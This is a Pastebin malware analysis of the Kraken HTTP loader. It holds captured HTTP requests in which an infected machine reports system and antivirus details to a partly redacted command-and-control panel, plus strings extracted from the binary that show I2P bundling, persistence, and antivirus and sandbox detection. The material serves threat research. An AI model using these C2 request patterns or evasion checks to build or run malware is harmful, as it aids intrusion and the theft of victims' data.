StopMalvertising

Kraken HTTP Loader

Sep 28th, 2020 (edited)
1,750
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.15 KB | None | 0 0
  1. Kraken HTTP Loader - 2015
  2.  
  3. GET http://94.156.xxx.xxx/panel/includes/verif.php HTTP/1.0
  4. HTTP/1.1 200 OK
  5. Date: Thu, 05 Feb 2015 07:56:22 GMT
  6. Server: Apache/2.2.22 (Debian)
  7. X-Powered-By: PHP/5.4.36-0+deb7u1
  8. Vary: Accept-Encoding
  9. Content-Length: 1
  10. Connection: close
  11. Content-Type: text/html
  12. 1
  13. --
  14. GET http://94.156.xxx.xxx/panel/includes/fileupload.php HTTP/1.0
  15. HTTP/1.1 200 OK
  16. Date: Thu, 05 Feb 2015 07:56:23 GMT
  17. Server: Apache/2.2.22 (Debian)
  18. X-Powered-By: PHP/5.4.36-0+deb7u1
  19. Set-Cookie: PHPSESSID=vgm1ffpdpgjeojfn4jo9cf6ij1; path=/
  20. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  21. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  22. Pragma: no-cache
  23. Vary: Accept-Encoding
  24. Content-Length: 1
  25. Connection: close
  26. Content-Type: text/html
  27. 0
  28. --
  29. GET http://94.156.xxx.xxx/panel/includes/f_i_l_e_h_o_s_t.php HTTP/1.0
  30. HTTP/1.1 200 OK
  31. Date: Thu, 05 Feb 2015 07:56:24 GMT
  32. Server: Apache/2.2.22 (Debian)
  33. X-Powered-By: PHP/5.4.36-0+deb7u1
  34. Set-Cookie: PHPSESSID=6thrarifgctqil07hgpi7veut2; path=/
  35. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  36. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  37. Pragma: no-cache
  38. Vary: Accept-Encoding
  39. Content-Length: 1
  40. Connection: close
  41. Content-Type: text/html
  42. 0
  43. --
  44. GET http://94.156.xxx.xxx/panel/includes/persis.php HTTP/1.0
  45. HTTP/1.1 200 OK
  46. Date: Thu, 05 Feb 2015 07:56:25 GMT
  47. Server: Apache/2.2.22 (Debian)
  48. X-Powered-By: PHP/5.4.36-0+deb7u1
  49. Set-Cookie: PHPSESSID=df5vcfuhp06buj5sttss824e02; path=/
  50. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  51. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  52. Pragma: no-cache
  53. Vary: Accept-Encoding
  54. Content-Length: 1
  55. Connection: close
  56. Content-Type: text/html
  57. 0
  58. --
  59. GET http://94.156.xxx.xxx/panel/includes/btcplugin.php HTTP/1.0
  60. HTTP/1.1 200 OK
  61. Date: Thu, 05 Feb 2015 07:56:26 GMT
  62. Server: Apache/2.2.22 (Debian)
  63. X-Powered-By: PHP/5.4.36-0+deb7u1
  64. Set-Cookie: PHPSESSID=el5341ajdcecaa316mro7tssg1; path=/
  65. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  66. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  67. Pragma: no-cache
  68. Vary: Accept-Encoding
  69. Content-Length: 0
  70. Connection: close
  71. Content-Type: text/html
  72. --
  73. GET http://94.156.xxx.xxx/panel/includes/d_elay.php HTTP/1.0
  74. HTTP/1.1 200 OK
  75. Date: Thu, 05 Feb 2015 07:56:31 GMT
  76. Server: Apache/2.2.22 (Debian)
  77. X-Powered-By: PHP/5.4.36-0+deb7u1
  78. Set-Cookie: PHPSESSID=ljhhe8nescblgvn00cu74sb7s7; path=/
  79. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  80. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  81. Pragma: no-cache
  82. Vary: Accept-Encoding
  83. Content-Length: 5
  84. Connection: close
  85. Content-Type: text/html
  86. 60000
  87. --
  88. GET http://94.156.xxx.xxx/panel/includes/day.php HTTP/1.0
  89. HTTP/1.1 200 OK
  90. Date: Thu, 05 Feb 2015 07:56:33 GMT
  91. Server: Apache/2.2.22 (Debian)
  92. X-Powered-By: PHP/5.4.36-0+deb7u1
  93. Vary: Accept-Encoding
  94. Content-Length: 8
  95. Connection: close
  96. Content-Type: text/html
  97. 20150205
  98. --
  99. GET http://94.156.xxx.xxx/panel/includes/ip.php HTTP/1.0
  100. HTTP/1.1 200 OK
  101. Date: Thu, 05 Feb 2015 07:56:34 GMT
  102. Server: Apache/2.2.22 (Debian)
  103. X-Powered-By: PHP/5.4.36-0+deb7u1
  104. Vary: Accept-Encoding
  105. Content-Length: 13
  106. Connection: close
  107. Content-Type: text/html
  108. xxx.xxx.xxx.xxx
  109. --
  110. GET http://94.156.xxx.xxx/panel/includes/country.php?IP=xxx.xxx.xxx.xxx HTTP/1.0
  111. HTTP/1.1 200 OK
  112. Date: Thu, 05 Feb 2015 07:56:36 GMT
  113. Server: Apache/2.2.22 (Debian)
  114. X-Powered-By: PHP/5.4.36-0+deb7u1
  115. Vary: Accept-Encoding
  116. Content-Length: 9
  117. Connection: close
  118. Content-Type: text/html
  119. Australia
  120. --
  121. GET /panel/includes/idcontact.php?COMPUTER=xxxxx-PC-49&steam=0&origin=0&webnavig=1&java=0&net=1&memoireRAMbytes=1073274880&diskhard=68611469312&avname=0&parefire=0&install=20150205&gpu=0&cpu=Intel(R)Core(TM)i7-4710MQCPU@2.50GHz HTTP/1.0
  122. Host: 94.156.xxx.xxx
  123. User-Agent: crackim
  124. Connection: Close
  125. HTTP/1.1 200 OK
  126. Date: Thu, 05 Feb 2015 07:56:37 GMT
  127. Server: Apache/2.2.22 (Debian)
  128. X-Powered-By: PHP/5.4.36-0+deb7u1
  129. Set-Cookie: PHPSESSID=6ia3s0tisrn2ek2scvr2evfp72; path=/
  130. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  131. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  132. Pragma: no-cache
  133. Vary: Accept-Encoding
  134. Content-Length: 14
  135. Connection: close
  136. Content-Type: text/html
  137. Statistics Ok!
  138. --
  139. GET http://94.156.xxx.xxx/panel/includes/bkill.php HTTP/1.0
  140. HTTP/1.1 200 OK
  141. Date: Thu, 05 Feb 2015 07:56:38 GMT
  142. Server: Apache/2.2.22 (Debian)
  143. X-Powered-By: PHP/5.4.36-0+deb7u1
  144. Set-Cookie: PHPSESSID=12nvu44selb1d89dghcc0g9bs4; path=/
  145. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  146. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  147. Pragma: no-cache
  148. Vary: Accept-Encoding
  149. Content-Length: 1
  150. Connection: close
  151. Content-Type: text/html
  152. 0
  153. --
  154. GET http://94.156.xxx.xxx/panel/includes/install_info.php HTTP/1.0
  155. HTTP/1.1 200 OK
  156. Date: Thu, 05 Feb 2015 07:56:40 GMT
  157. Server: Apache/2.2.22 (Debian)
  158. X-Powered-By: PHP/5.4.36-0+deb7u1
  159. Vary: Accept-Encoding
  160. Content-Length: 8
  161. Connection: close
  162. Content-Type: text/html
  163. 20150205
  164. --
  165. GET http://94.156.xxx.xxx/panel/includes/pinginfo.php HTTP/1.0
  166. HTTP/1.1 200 OK
  167. Date: Thu, 05 Feb 2015 07:57:47 GMT
  168. Server: Apache/2.2.22 (Debian)
  169. X-Powered-By: PHP/5.4.36-0+deb7u1
  170. Vary: Accept-Encoding
  171. Content-Length: 2
  172. Connection: close
  173. Content-Type: text/html
  174. 57
  175. --
  176. GET /panel/includes/get.php?IP=xxx.xxx.xxx.xxx&COMPUTER=xxxxx-PC-49&OS=Windows7&COUNTRY=[redacted]&HWID={e29xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}{24 numbers}&INSTALL=20150205&PING=57&INSTAL=20150205&V=1.3&Arch=32 HTTP/1.0
  177. Host: 94.156.xxx.xxx
  178. User-Agent: crackim
  179. Connection: Close
  180. HTTP/1.1 200 OK
  181. Date: Thu, 05 Feb 2015 07:57:48 GMT
  182. Server: Apache/2.2.22 (Debian)
  183. X-Powered-By: PHP/5.4.36-0+deb7u1
  184. Set-Cookie: PHPSESSID=bbau8mcveutda9bjbd66prmp56; path=/
  185. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  186. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  187. Pragma: no-cache
  188. Vary: Accept-Encoding
  189. Content-Length: 0
  190. Connection: close
  191. Content-Type: text/html
  192. --
  193. GET http://94.156.xxx.xxx/panel/includes/post.php HTTP/1.0
  194. HTTP/1.1 200 OK
  195. Date: Thu, 05 Feb 2015 07:57:49 GMT
  196. Server: Apache/2.2.22 (Debian)
  197. X-Powered-By: PHP/5.4.36-0+deb7u1
  198. Set-Cookie: PHPSESSID=qrdsv1aneibeds76bj686flvh3; path=/
  199. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  200. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  201. Pragma: no-cache
  202. Vary: Accept-Encoding
  203. Content-Length: 2
  204. Connection: close
  205. Content-Type: text/html
  206. *0
  207. --
  208.  
  209. SOME STRINGS
  210.  
  211. 0x4120b8 (11): getnameinfo
  212. 0x4120c4 (12): freeaddrinfo
  213. 0x4120d4 (11): getaddrinfo
  214. 0x4120e0 (10): ws2_32.dll
  215. 0x41301a (38): \System\Oracle\azioklmpx\i2p\jbigi.dll
  216. 0x413042 (67): \System\Oracle\azioklmpx\i2p\certificates\ssl\ieb9oopo.mooo.com.crt
  217. 0x413086 (22): (x86)\AVAST Software\
  218. 0x4130a0 (37): i2p/certificates/ssl/link.mx24.eu.crt
  219. 0x4130c6 (40): \System\Oracle\azioklmpx\i2p\lib\BOB.jar
  220. 0x4130ef (14): (x86)\Google\
  221. 0x4130fe (37): i2p/set_config_dir_for_nt_service.bat
  222. 0x413124 (39): i2p/certificates/ssl/193.150.121.66.crt
  223. 0x41314c (25): i2p/lib/routerconsole.jar
  224. 0x41316f (10): persis.php
  225. 0x413182 (13): i2p/admin.exe
  226. 0x413190 (26): i2p/lib/jasper-runtime.jar
  227. 0x4131ab (69): \System\Oracle\azioklmpx\i2p\certificates\reseed\swat_at_mail.i2p.crt
  228. 0x413207 (13): btcplugin.php
  229. 0x41321c (55): \System\Oracle\azioklmpx\i2p\lib\jetty-continuation.jar
  230. 0x413254 (18): i2p/icons/iggy.xpm
  231. 0x41329f (51): \System\Oracle\azioklmpx\i2p\lib\jetty-security.jar
  232. 0x4132d3 (41): i2p/certificates/news/zzz_at_mail.i2p.crt
  233. 0x413342 (18): i2p/lib/jrobin.jar
  234. 0x413355 (12): kit47896.exe
  235. 0x413362 (15): 414fileh0st.exe
  236. 0x413372 (35): \System\Oracle\azioklmpx\search.exe
  237. 0x413396 (45): i2p/certificates/reseed/bugme_at_mail.i2p.crt
  238. 0x4133c4 (16): i2p/lib/jstl.jar
  239. 0x4133d5 (42): \System\Oracle\azioklmpx\i2p\lib\jbigi.jar
  240. 0x413400 (33): \System\Oracle\azioklmpx\i2p\lib\
  241. 0x413424 (49): \System\Oracle\azioklmpx\i2p\certificates\reseed\
  242. 0x413467 (54): \System\Oracle\azioklmpx\i2p\lib\org.mortbay.jetty.jar
  243. 0x41349e (29): \System\Oracle\azioklmpx\i2p\
  244. 0x4134be (13): (x86)\Opera\
  245. 0x4134d4 (40): \System\Oracle\azioklmpx\i2p\lib\sam.jar
  246. 0x41350f (41): \System\Oracle\azioklmpx\i2p\lib\jstl.jar
  247. 0x413541 (67): \System\Oracle\azioklmpx\i2p\certificates\ssl\jp.reseed.i2p2.no.crt
  248. 0x4135d4 (15): country.php?IP=
  249. 0x4135e6 (70): \System\Oracle\azioklmpx\i2p\certificates\router\str4d_at_mail.i2p.crt
  250. 0x41363a (10): &COMPUTER=
  251. 0x413645 (66): \System\Oracle\azioklmpx\i2p\certificates\news\zzz_at_mail.i2p.crt
  252. 0x413688 (26): i2p/lib/jetty-servlets.jar
  253. 0x4136c0 (64): \System\Oracle\azioklmpx\i2p\certificates\ssl\193.150.121.66.crt
  254. 0x413706 (52): \System\Oracle\azioklmpx\i2p\lib\commons-logging.jar
  255. 0x41374f (61): \System\Oracle\azioklmpx\i2p\certificates\ssl\reseed.info.crt
  256. 0x41378d (38): \System\Oracle\azioklmpx\i2p\value.txt
  257. 0x4137e8 (48): \System\Oracle\azioklmpx\i2p\webapps\susidns.war
  258. 0x413819 (46): \System\Oracle\azioklmpx\i2p\lib\streaming.jar
  259. 0x413848 (25): i2p/lib/jetty-servlet.jar
  260. 0x413862 (18): i2p/icons/iggy.ico
  261. 0x413875 (20): i2p/lib/jetty-io.jar
  262. 0x4139a1 (38): i2p/certificates/ssl/netdb.i2p2.no.crt
  263. 0x4139c8 (16): install_info.php
  264. 0x4139ec (47): \System\Oracle\azioklmpx\i2p\lib\mstreaming.jar
  265. 0x413a1c (45): \System\Oracle\azioklmpx\i2p\lib\jetty-io.jar
  266. 0x413a4a (14): (x86)\comodo\
  267. 0x413b5a (25): i2p/lib/javax.servlet.jar
  268. 0x413b74 (21): i2p/lib/i2ptunnel.jar
  269. 0x413b8a (44): i2p/certificates/reseed/swat_at_mail.i2p.crt
  270. 0x413bb7 (11): (x86)\AVG\
  271. 0x413bc3 (52): \System\Oracle\azioklmpx\i2p\lib\jetty-sslengine.jar
  272. 0x413c17 (70): \System\Oracle\azioklmpx\i2p\certificates\news\echelon_at_mail.i2p.crt
  273. 0x413c78 (36): \System\Oracle\azioklmpx\ext\ext.txt
  274. 0x413c9d (46): \System\Oracle\azioklmpx\i2p\lib\jetty-xml.jar
  275. 0x413cd8 (24): i2p/geoip/geoipv6.dat.gz
  276. 0x413d1e (11): i2p/i2p.exe
  277. 0x413d3e (47): i2p/certificates/reseed/echelon_at_mail.i2p.crt
  278. 0x413d76 (49): \System\Oracle\azioklmpx\i2p\scripts\i2pProxy.pac
  279. 0x413db5 (47): \System\Oracle\azioklmpx\i2p\lib\desktopgui.jar
  280. 0x413de5 (34): \System\Oracle\azioklmpx\unrar.lib
  281. 0x413e08 (13): (x86)\Steam\
  282. 0x413e16 (34): i2p/lib/jetty-java5-threadpool.jar
  283. 0x413e39 (17): &memoireRAMbytes=
  284. 0x413e55 (22): i2p/lib/jetty-http.jar
  285. 0x413e6f (33): i2p/install_i2p_service_winnt.bat
  286. 0x413e91 (30): \System\Oracle\azioklmpx\hzid\
  287. 0x413eb0 (20): i2p/lib/standard.jar
  288. 0x413ec5 (45): i2p/certificates/reseed/sindu_at_mail.i2p.crt
  289. 0x413f11 (47): \System\Oracle\azioklmpx\i2p\lib\jetty-util.jar
  290. 0x413f4f (50): i2p/certificates/router/killyourtv_at_mail.i2p.crt
  291. 0x413f8d (18): i2p/lib/router.jar
  292. 0x413fac (45): \System\Oracle\azioklmpx\i2p\lib\standard.jar
  293. 0x413fda (22): i2p/lib/commons-el.jar
  294. 0x413ff1 (16): gettask.php?RUN=
  295. 0x414002 (17): i2p/lib/jbigi.jar
  296. 0x4140df (16): \bitck1\Text.txt
  297. 0x41410a (29): i2p/lib/org.mortbay.jetty.jar
  298. 0x414131 (62): \System\Oracle\azioklmpx\i2p\certificates\ssl\link.mx24.eu.crt
  299. 0x414170 (24): i2p/lib/jetty-webapp.jar
  300. 0x41418c (40): \System\Oracle\azioklmpx\i2p\wrapper.log
  301. 0x4141b5 (14): (x86)\McAfee\
  302. 0x4141d3 (75): \System\Oracle\azioklmpx\i2p\certificates\router\killyourtv_at_mail.i2p.crt
  303. 0x4142d5 (14): fileupload.php
  304. 0x4142f7 (49): \System\Oracle\azioklmpx\i2p\lib\jetty-webapp.jar
  305. 0x41432f (23): \System\Oracle\smss.exe
  306. 0x414392 (46): \System\Oracle\azioklmpx\i2p\lib\systray4j.dll
  307. 0x4143c1 (46): i2p/certificates/reseed/backup_at_mail.i2p.crt
  308. 0x4143f0 (19): i2p/lib/wrapper.dll
  309. 0x414409 (25): i2p/webapps/i2ptunnel.war
  310. 0x41443e (23): i2p/webapps/susidns.war
  311. 0x414456 (21): i2p/lib/streaming.jar
  312. 0x41446c (11): sandboxfuck
  313. 0x41447c (15): i2p/wrapper.log
  314. 0x414499 (10): d_elay.php
  315. 0x4144d6 (43): \System\Oracle\azioklmpx\i2p\wrapper.config
  316. 0x414502 (48): \System\Oracle\azioklmpx\i2p\geoip\countries.txt
  317. 0x414533 (44): \System\Oracle\azioklmpx\i2p\geoip\geoip.txt
  318. 0x414572 (42): i2p/certificates/ssl/us.reseed.i2p2.no.crt
  319. 0x4145a5 (23): i2p/geoip/countries.txt
  320. 0x4145bd (58): \System\Oracle\azioklmpx\i2p\install_i2p_service_winnt.bat
  321. 0x4145f8 (42): i2p/certificates/ssl/uk.reseed.i2p2.no.crt
  322. 0x414623 (19): i2p/geoip/geoip.txt
  323. 0x414637 (37): \System\Oracle\azioklmpx\i2p\scripts\
  324. 0x41465d (71): \System\Oracle\azioklmpx\i2p\certificates\ssl\reseed.i2p-projekt.de.crt
  325. 0x4146a5 (19): i2p/lib/systray.jar
  326. 0x4146b9 (37): \System\Oracle\azioklmpx\i2p\webapps\
  327. 0x4146f2 (37): i2p/certificates/ssl/i2p.mooo.com.crt
  328. 0x414718 (42): i2p/certificates/ssl/cert.smartcom.org.crt
  329. 0x414743 (21): i2p/lib/jetty-xml.jar
  330. 0x414759 (30): i2p/lib/jetty-continuation.jar
  331. 0x414781 (27): i2p/lib/jasper-compiler.jar
  332. 0x41479d (58): \System\Oracle\azioklmpx\i2p\lib\jetty-rewrite-handler.jar
  333. 0x4147e7 (12): pinginfo.php
  334. 0x4147f4 (49): \System\Oracle\azioklmpx\i2p\geoip\geoipv6.dat.gz
  335. 0x414826 (35): \System\Oracle\azioklmpx\i2p\geoip\
  336. 0x41484a (26): i2p/lib/jetty-security.jar
  337. 0x414865 (47): \System\Oracle\azioklmpx\i2p\certificates\news\
  338. 0x41489d (43): \System\Oracle\azioklmpx\i2p\systray.config
  339. 0x414981 (42): \System\Oracle\azioklmpx\i2p\certificates\
  340. 0x4149ac (14): (x86)\G Data\
  341. 0x4149bb (51): \System\Oracle\azioklmpx\i2p\lib\jasper-runtime.jar
  342. 0x4149ef (24): C:\Program Files\McAfee\
  343. 0x414a80 (46): \System\Oracle\azioklmpx\i2p\lib\systray4j.jar
  344. 0x414ab8 (75): \System\Oracle\azioklmpx\i2p\certificates\reseed\killyourtv_at_mail.i2p.crt
  345. 0x414b58 (43): \System\Oracle\azioklmpx\i2p\lib\jrobin.jar
  346. 0x414b84 (19): i2p/lib/wrapper.jar
  347. 0x414b98 (27): i2p/lib/org.mortbay.jmx.jar
  348. 0x414bb4 (23): i2p/lib/jetty-start.jar
  349. 0x414bcc (21): (x86)\Kaspersky Lab\
  350. 0x414c47 (52): \System\Oracle\azioklmpx\i2p\webapps\addressbook.war
  351. 0x414d2e (43): i2p/certificates/news/str4d_at_mail.i2p.crt
  352. 0x414f58 (22): i2p/lib/mstreaming.jar
  353. 0x414f7a (21): i2p/lib/systray4j.dll
  354. 0x414f90 (77): User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
  355. 0x414fde (12): (x86)\ESET\
  356. 0x415089 (46): \System\Oracle\azioklmpx\i2p\lib\jetty-i2p.jar
  357. 0x4150b8 (13): btcplugin.exe
  358. 0x4150c6 (38): \System\Oracle\azioklmpx\i2p\admin.exe
  359. 0x415154 (10): &diskhard=
  360. 0x41525a (29): i2p/webapps/routerconsole.war
  361. 0x4153c2 (52): \System\Oracle\azioklmpx\i2p\lib\jasper-compiler.jar
  362. 0x415410 (67): \System\Oracle\azioklmpx\i2p\certificates\ssl\us.reseed.i2p2.no.crt
  363. 0x41547f (24): i2p/scripts/i2pProxy.pac
  364. 0x41563a (10): &webnavig=
  365. 0x41564c (22): i2p/lib/jetty-util.jar
  366. 0x415663 (15): i2p/lib/BOB.jar
  367. 0x415673 (23): idcontact.php?COMPUTER=
  368. 0x41568b (68): \System\Oracle\azioklmpx\i2p\certificates\router\zzz_at_mail.i2p.crt
  369. 0x4156d0 (15): Virtual_Machine
  370. 0x4156e0 (40): \System\Oracle\azioklmpx\i2p\lib\i2p.jar
  371. 0x415709 (33): i2p/lib/jetty-rewrite-handler.jar
  372. 0x41572b (39): \System\Oracle\azioklmpx\i2p\jcpuid.dll
  373. 0x4159fa (38): \System\Oracle\azioklmpx\hzid\hzid.txt
  374. 0x415a8c (32): \System\Oracle\azioklmpx\key.exe
  375. 0x415b29 (47): \System\Oracle\azioklmpx\i2p\lib\commons-el.jar
  376. 0x415bae (10): &parefire=
  377. 0x415bb9 (10): click.pack
  378. 0x415c67 (33): (x86)\Malwarebytes Anti-Malware\
  379. 0x415ccb (19): (x86)\BitDefender\
  380. 0x415cdf (19): f_i_l_e_h_o_s_t.php
  381. 0x415cf3 (44): i2p/certificates/reseed/meeh_at_mail.i2p.crt
  382. 0x415d20 (39): (x86)\AntiVir PersonalEdition Classic\
  383. 0x415e60 (50): \System\Oracle\azioklmpx\i2p\lib\javax.servlet.jar
  384. 0x415e93 (46): \System\Oracle\azioklmpx\i2p\lib\i2ptunnel.jar
  385. 0x416185 (27): i2p/lib/jetty-sslengine.jar
  386. 0x4161a1 (32): (x86)\Norton Internet Security\
  387. ---
  388. Refs:
  389. http://blogs.quickheal.com/wp/malware-case-study-kraken-rat-running-behind-bitcoins/
  390. https://ica.su/showthread.php?t=82234
Add Comment
Please, Sign In to add comment